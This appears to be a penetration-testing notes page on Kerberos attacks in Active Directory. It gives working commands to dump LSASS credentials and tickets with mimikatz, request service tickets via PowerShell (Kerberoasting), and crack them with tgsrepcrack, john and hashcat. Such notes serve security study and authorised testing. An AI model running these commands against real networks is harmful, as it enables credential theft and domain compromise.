Creating & Cracking TGS

There are a couple of weak points through which the kerberos authentication process can be hijacked to reveal sensitive information.

Cached Credentials

The user password is stored in the system memory in order to renew a TGT from a domain controller. The password is stored in the Local Security Authority Subsystem Service (LSASS) and there is no straight forward method to retrieve this password.

The user will require System or Local Administrator level permission to gain access to the hashes stored on a target.

We can use the mimikatz.exe tool to extract this information,

mimikatz.exe

privilege::debug #elevate the privilege

sekurlsa::logonpasswords #list the logon passwords

These commands will list the uses along with their passwords in various hash formats depending on the AD configuration. NTLM or WDigest algorithms may be used.

Listing TGT & Service Tickets

Just as retrieving passwords, we can also retrieve TGT or Service Tickets using mimikatz.

mimikatz.exe

privilege::debug #elevate the privilege

sekurlsa::tickets #All the tickets

Now, in order to download the tickets, the user of that system should have requested for those tickets from TGS. But in the case where no tickets were already requested, fresh request can be made and then downloaded.

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/PWebserver.particle42.com'

Using the above commands in powershell we can request for a ticket to any SPN. Then the tickets can be exported into a file using the following command within mimikatz,

kerberos::list /export

The exported kirbi files can be cracked using kerberoast,

python /usr/share/kerberoast/tgsrepcrack.py rockyou.txt HTTP~PWebServer.particle42.com-CORP.COM.kirbi

Alternatively the files can also be cracked using hashcat or john using the following commands,

John

python3 kirbi2john.py -o http_corp.john HTTP_Corp.kirbi #convert to john format
john --wordlist=pass.txt http_corp.john

Hashcat

Ensure that the tickets are in hashcat format for cracking

hashcat -m 13100 http_corp_hashcat.hash pass.txt

Last updated